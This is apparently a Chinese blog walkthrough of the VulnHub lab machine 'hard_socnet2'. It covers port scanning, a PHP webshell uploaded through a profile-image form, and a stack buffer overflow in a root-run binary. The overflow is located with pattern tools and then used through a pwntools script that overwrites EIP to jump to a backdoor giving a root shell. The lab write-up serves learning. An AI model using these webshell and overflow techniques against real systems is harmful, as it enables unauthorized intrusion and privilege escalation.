vulnhub5

本贴最后更新于 530 天前,其中的信息可能已经时移世异

靶机下载地址:

https://download.vulnhub.com/boredhackerblog/hard_socnet2.ova

信息收集

第一步信息收集,还是老方法我习惯 fscan 和 nmap 一起用

Fscan 简单探测全局信息

┌──(kali㉿kali)-[~/Desktop/Tools/fscan] └─$ ./fscan_amd64 -h 192.168.120.141 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.2 start infoscan trying RunIcmp2 The current user permissions unable to send icmp packets start ping (icmp) Target 192.168.120.141 is alive [*] Icmp alive hosts len is: 1 192.168.120.141:22 open 192.168.120.141:80 open 192.168.120.141:8000 open [*] alive ports len is: 3 start vulscan [*] WebTitle: http://192.168.120.141:8000 code:501 len:216 title:Error response [*] WebTitle: http://192.168.120.141 code:200 len:10609 title:Social Network

nmap 扫描全端口

┌──(kali㉿kali)-[~/Desktop/Tools/fscan] └─$ sudo nmap --min-rate 10000 -p- 192.168.120.141 Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-01 19:15 CST Nmap scan report for 192.168.120.141 Host is up (0.000033s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 8000/tcp open http-alt MAC Address: 00:0C:29:F4:0E:58 (VMware) Nmap done: 1 IP address (1 host up) scanned in 7.00 seconds

nmap 扫描开放端口和操作系统的信息

┌──(kali㉿kali)-[~/Desktop/Tools/fscan] └─$ sudo nmap -sT -sV -O -p 22,80,8000 192.168.120.141 Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-01 19:16 CST Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 33.33% done; ETC: 19:16 (0:00:12 remaining) Nmap scan report for 192.168.120.141 Host is up (0.00013s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) 8000/tcp open http BaseHTTPServer 0.3 (Python 2.7.15rc1) MAC Address: 00:0C:29:F4:0E:58 (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.57 seconds

getshell

开放了两个 web 服务一个是 apache2 的,还有一个是 python 的

这里正常思路就是先访问 web 服务了,首先是 80 端口的服务

image

是一个用户登录注册的地方,因为这里没有 admin 的邮箱地址,所以我们只能尝试使用注册来看看登录后的系统是否存在漏洞

首先我们注册账号:

image

登录后简单测一下漏洞:

image

发现有 xss(但是没啥用)

image

测试其他漏洞:

image

发现了文件上传,这里可以简单测试一下:

image

传个马,似乎成功了,试一下连接:

image

找到地址:http://192.168.120.141/data/images/profiles/3.php

image

可以成功连接

权限提升 1

提权:

image

发现这个 cve 依旧可以。。。

权限提升 2

但是这里的预期解似乎不是这个,预期解需要 Pwn

现学 Pwn 咯

我们 getshell 之后可以在/home/user 目录看到

image

一个 root 权限启动的服务

我们下载到 Kali ​用 pwngdb ​调试他(未安装可以安装一下:pwndbg/pwndbg: Exploit Development and Reverse Engineering with GDB Made Easy (github.com))

先用 checksec 看一下开启的保护:

┌──(kali㉿kali)-[~/Desktop] └─$ checksec add_record [*] '/home/kali/Desktop/add_record' Arch: i386-32-little RELRO: No RELRO Stack: No canary found NX: NX unknown - GNU_STACK missing PIE: No PIE (0x8048000) Stack: Executable RWX: Has RWX segments

除了一个 Stack,其他全关

启动一下 Pwngdb:

┌──(root㉿kali)-[/home/kali/Desktop] └─# gdb -q add_record pwndbg: loaded 147 pwndbg commands and 47 shell commands. Type pwndbg [--shell | --all] [filter] for a list. pwndbg: created $rebase, $ida GDB functions (can be used with print/break) Reading symbols from add_record... (No debugging symbols found in add_record) ------- tip of the day (disable with set show-tips off) ------- Pwndbg context displays where the program branches to thanks to emulating few instructions into the future. You can disable this with set emulate off which may also speed up debugging pwndbg>

我们先测试哪里存在栈溢出(因为只会栈溢出)

先准备好多个 A 用于测试栈溢出:

┌──(kali㉿kali)-[~/Desktop] └─$ python -c "print('A'*1000)" AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

用 r 执行让程序跑起来:

image

输入后发现程序异常直接退出,判断这里不存在栈溢出,接着下一个点测试:

image

同样正常退出,接着往下测试,直到最后一个 explain:

pwndbg> r Starting program: /home/kali/Desktop/add_record [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Welcome to Add Record application Use it to add info about Social Network 2.0 Employees Employee Name(char): a Years worked(int): 1 Salary(int): 1 Ever got in trouble? 1 (yes) or 0 (no): 1 Explain: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────[ REGISTERS / show-flags off / show-compact-regs off ]───────── *EAX 0xffffd27e ◂— 0x41414141 ('AAAA') *EBX 0x41414141 ('AAAA') *ECX 0xffffd6c0 ◂— 'AAAA' *EDX 0xffffd662 ◂— 'AAAA' *EDI 0xffffd340 ◂— 0x41414141 ('AAAA') *ESI 0x80488d0 (__libc_csu_init) ◂— push ebp *EBP 0x41414141 ('AAAA') *ESP 0xffffd2c0 ◂— 0x41414141 ('AAAA') *EIP 0x41414141 ('AAAA') ──────────────────[ DISASM / i386 / set emulate on ]─────────────────── Invalid address 0x41414141 ───────────────────────────────[ STACK ]─────────────────────────────── 00:0000│ esp 0xffffd2c0 ◂— 0x41414141 ('AAAA') ... ↓ 7 skipped ─────────────────────────────[ BACKTRACE ]───────────────────────────── ► 0 0x41414141 1 0x41414141 2 0x41414141 3 0x41414141 4 0x41414141 5 0x41414141 6 0x41414141 7 0x41414141 ───────────────────────────────────────────────────────────────────────

这里发现可以覆盖掉栈的地址,说明我们这里是可能存在漏洞的

如何利用呢?

利用 IDA 打开这个程序可以发现

image

这个程序是存在 backdoor ​的,直接返回一个 system('/bin/sh')

所以只要覆盖掉 EIP ​的地址为 backdoor ​函数的地址即可执行 backdoor 返回一个 /bin/sh

下一步工作就是测试哪个位置可以覆盖 EIP,因为我们输入的 1000 个 A 中不知道具体是哪几个站住了 EIP 的地址

只知道确实是可以覆盖的:

image

所以我们利用 MSF 生成的随机字符串来定位:

msf-pattern_create -l 1000

image

如图我们可以知道是 0Ac1 覆盖了 EIP,所以我们查找 0Ac1 前面有几个字符:

msf-pattern_offset -q 0Ab1

image

发现是 62 个,所以我们前面填充 62 位

开始编写 EXP:

image

这里看到 backdoor ​的地址是 0x08048676

垃圾字符是 62 个

写 EXP:

from pwn import * p = process("./add_record") backdoor = 0x8048676 p.sendline(b'1') p.sendline(b'1') p.sendline(b'1') p.sendline(b'1') payload = b'a'*62 + p32(backdoor) p.sendline(payload) p.interactive()

但是只能在目标系统上执行不能打远程环境,用这个

python -c "import struct;print('aa\n1\n1\n1\n' + 'A'*62 + struct.pack('I',0x08048676))" > payload

然后运行

cat payload - | ./add_record

即可 getshell,并且为 root 权限,短划线 -​ 表示将前一个命令的标准输出(在这种情况下是 "payload" 字符串)重定向到 ./add_record 程序的标准输入,这样 ./add_record 将从标准输入读取 "payload" 字符串

image

Pwn 学习参考链接

pwn 学习----定位溢出点位置_pwn 通过把编译 判断溢出位置-CSDN 博客

  • 安全

    安全永远都不是一个小问题。

    203 引用 • 818 回帖 • 2 关注

相关帖子

回帖

欢迎来到这里!

我们正在构建一个小众社区,大家在这里相互信任,以平等 • 自由 • 奔放的价值观进行分享交流。最终,希望大家能够找到与自己志同道合的伙伴,共同成长。

注册 关于
请输入回帖内容 ...